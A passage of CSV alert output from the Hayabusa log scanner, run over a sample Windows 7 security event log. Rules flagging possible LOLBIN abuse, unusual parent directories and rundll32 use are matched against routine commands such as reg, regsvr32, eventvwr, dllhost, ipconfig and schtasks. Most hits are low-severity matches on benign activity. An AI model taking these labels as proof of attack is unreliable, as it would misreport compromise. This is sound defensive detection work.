22F8D0F1805E128ED9C40EA3A4181C89 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:20.040 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\microsoft\emet_up hklm\software\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:20.058 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""regsvr32.exe"" /s ""C:\Program Files\EMET 5.5\EMET_CE.DLL"" | Path: C:\Windows\System32\regsvr32.exe | PID: 0x17d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:20.147 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x13d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:20.214 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\policies\microsoft\emet_up hklm\software\policies\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x17c0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-09-01 20:50:20.258 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\policies\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x14cc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:53:20.687 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1598 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:53:20.767 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:53:20.804 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x364 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:53:20.815 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:53:20.853 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1628 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 21:14:21.908 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 21:24:37.363 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x16d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 21:24:37.378 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x148c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:32.954 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:33.005 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible 
LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:33.233 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:33.396 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x175c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:33.853 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:33.972 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:53.121 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1360 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:10:30.765 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:46:22.988 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1780 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:46:23.139 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x100 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:46:23.201 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:48:22.957 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible 
LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x8d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:48:22.957 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:00:00.476 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1698 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:04:56.561 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x16ac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:05:21.063 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x994 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:14.714 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0x13a0 | User: 
IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:14.738 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x10f4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:39.238 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:39.356 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcb4 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:39.409 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:39.433 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x62c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:39.445 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1294 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:39.484 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xe34 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:14:02.255 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe28 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:14:02.270 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x3c4 | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:14:53.117 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:53:11.002 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 16:09:57.128 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 16:40:58.690 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc4c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 16:41:25.835 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 17:05:36.136 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 18:07:04.144 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 18:18:00.297 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcac | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 18:18:00.345 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1084 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 18:18:00.364 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 18:18:00.383 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x5a0 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 18:18:00.420 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x11f4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 19:02:47.151 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 19:22:52.366 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 19:25:19.159 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x140 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 19:25:27.075 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d0 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 20:05:41.158 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 21:13:33.164 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 21:16:47.905 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 21:24:11.171 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x15a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 21:24:11.188 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:26.424 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:26.898 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:26.947 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x568 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:27.198 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:27.427 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:27.571 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | 